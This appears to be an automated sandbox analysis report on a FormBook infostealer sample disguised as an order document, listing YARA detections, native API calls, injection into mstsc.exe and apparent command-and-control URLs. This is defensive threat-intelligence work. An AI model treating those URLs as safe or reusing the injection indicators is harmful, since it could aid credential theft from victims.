          Source: explorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: mstsc.exe, 00000003.00000002.933646947.0000000005192000.00000004.00000001.sdmpString found in binary or memory: http://www.searchvity.com/
          Source: mstsc.exe, 00000003.00000002.933646947.0000000005192000.00000004.00000001.sdmpString found in binary or memory: http://www.searchvity.com/?dn=
          Source: explorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000002.00000000.694994164.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: Order 122001-220 guanzo.exe, 00000000.00000002.672340079.000000000259A000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
          Source: mstsc.exe, 00000003.00000002.933646947.0000000005192000.00000004.00000001.sdmpString found in binary or memory: https://www.pasteleriaruth.com/meub/?6lt4=M6ATVT20FLj&amp;ktI=BrZDxrt78R4OSP6X83RJQ8I8yi0a/QJgiEays5
          Source: mstsc.exe, 00000003.00000002.933646947.0000000005192000.00000004.00000001.sdmpString found in binary or memory: https://www.pasteleriaruth.com/meub/?6lt4=M6ATVT20FLj&ktI=BrZDxrt78R4OSP6X83RJQ8I8yi0a/QJgiEays5do7S

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000003.00000002.932617252.0000000004930000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.709019719.0000000001BF0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.708080084.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.708488650.00000000013F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.672575797.0000000003549000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.931109256.0000000000840000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.932653703.0000000004960000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.Order 122001-220 guanzo.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Order 122001-220 guanzo.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000003.00000002.932617252.0000000004930000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.932617252.0000000004930000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.709019719.0000000001BF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.709019719.0000000001BF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.708080084.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.708080084.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.708488650.00000000013F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.708488650.00000000013F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.672575797.0000000003549000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.672575797.0000000003549000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.931109256.0000000000840000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.931109256.0000000000840000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.932653703.0000000004960000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.932653703.0000000004960000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.Order 122001-220 guanzo.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.Order 122001-220 guanzo.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.Order 122001-220 guanzo.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.Order 122001-220 guanzo.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Initial sample is a PE file and has a suspicious nameShow sources
          Source: initial sampleStatic PE information: Filename: Order 122001-220 guanzo.exe
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_004181C0 NtCreateFile,
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_00418270 NtReadFile,
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_004182F0 NtClose,
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_004183A0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_004181BC NtCreateFile,
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0041826A NtReadFile,
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_004182EC NtClose,
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0041839B NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019299A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019295D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01929910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01929540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019298F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01929840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01929860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01929780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019297A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01929FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01929710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019296E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01929A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01929A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01929A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01929660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019299D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019295F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0192AD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01929520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01929950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01929560 NtWriteFile,
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019298A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01929820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0192B040 NtSuspendThread,
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0192A3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0192A710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01929B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01929730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01929770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0192A770 NtOpenThread,
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01929760 NtOpenProcess,
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01929A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019296D0 NtCreateKey,
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01929610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01929A10 NtQuerySection,
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01929650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01929670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B19860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B19840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B199A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B195D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B19910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B19540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B196E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B196D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B19660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B19650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B19A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B19780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B19FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B19710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B198A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B198F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B19820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B1B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B195F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B199D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B1AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B19520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B19560 NtWriteFile,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B19950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B19A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B19A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B19610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B19A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B19A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B19670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B1A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B197A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B19730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B1A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B19B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B19770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B1A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B19760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_008581C0 NtCreateFile,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_008582F0 NtClose,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_00858270 NtReadFile,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_008583A0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_008581BC NtCreateFile,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_008582EC NtClose,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0085826A NtReadFile,
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0085839B NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 0_2_0ADBB268
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 0_2_0ADB3AB8
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 0_2_0ADB3A60
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 0_2_0ADB4B70
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 0_2_0ADB4B61
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 0_2_0ADB4888
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 0_2_0ADB3440
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 0_2_0ADB0040
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 0_2_0ADB4877
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 0_2_0ADB6C18
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 0_2_0ADB3411
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 0_2_0ADB6C08
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 0_2_0ADB0007
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 0_2_0ADB8998
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 0_2_0ADB8988
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_00401027
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0041C82E
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_00401030
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0041A2A6
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0041BABD
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_00408C60
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_00408C1A
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0041B504
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_00402D90
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0041CE2B
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_00402FB0
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01912581
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019B25DD
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018FD5E0
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018EF900
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019B2D07
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018E0D20
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01904120
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019B1D55
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018FB090
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019120A0
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019B20A8
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018F841F
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019A1002
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0191EBB0
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019ADBD2
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019B1FF1
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019B2B28
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019B22AE
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019B2EF7
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01906E30
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B020A0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04BA20A8
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AEB090
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AE841F
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B91002
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B02581
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AED5E0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AD0D20
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AF4120
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04ADF900
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04BA2D07
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04BA1D55
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04BA22AE
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04BA2EF7
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AF6E30
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B0EBB0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04BA1FF1
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B9DBD2
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04BA2B28
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0085C82E
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0085A2A6
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_00848C1A
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_00848C60
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_00842D90
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0085B504
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0085CE2B
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_00842FB0
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: String function: 04ADB150 appears 35 times
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: String function: 018EB150 appears 35 times
          Source: Order 122001-220 guanzo.exe, 00000000.00000002.672340079.000000000259A000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSimpleUI.dll( vs Order 122001-220 guanzo.exe
          Source: Order 122001-220 guanzo.exe, 00000000.00000000.663743680.0000000000128000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameDispIdAttribute.exe0 vs Order 122001-220 guanzo.exe
          Source: Order 122001-220 guanzo.exe, 00000000.00000002.672575797.0000000003549000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameDSASignature.dll@ vs Order 122001-220 guanzo.exe
          Source: Order 122001-220 guanzo.exe, 00000001.00000002.708232981.0000000000F08000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameDispIdAttribute.exe0 vs Order 122001-220 guanzo.exe
          Source: Order 122001-220 guanzo.exe, 00000001.00000002.709376627.0000000003653000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamemstsc.exej% vs Order 122001-220 guanzo.exe
          Source: Order 122001-220 guanzo.exe, 00000001.00000002.708808706.00000000019DF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Order 122001-220 guanzo.exe
          Source: Order 122001-220 guanzo.exeBinary or memory string: OriginalFilenameDispIdAttribute.exe0 vs Order 122001-220 guanzo.exe
          Source: Order 122001-220 guanzo.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
          Source: 00000003.00000002.932617252.0000000004930000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.932617252.0000000004930000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.709019719.0000000001BF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.709019719.0000000001BF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.708080084.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.708080084.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.708488650.00000000013F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.708488650.00000000013F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.672575797.0000000003549000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.672575797.0000000003549000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
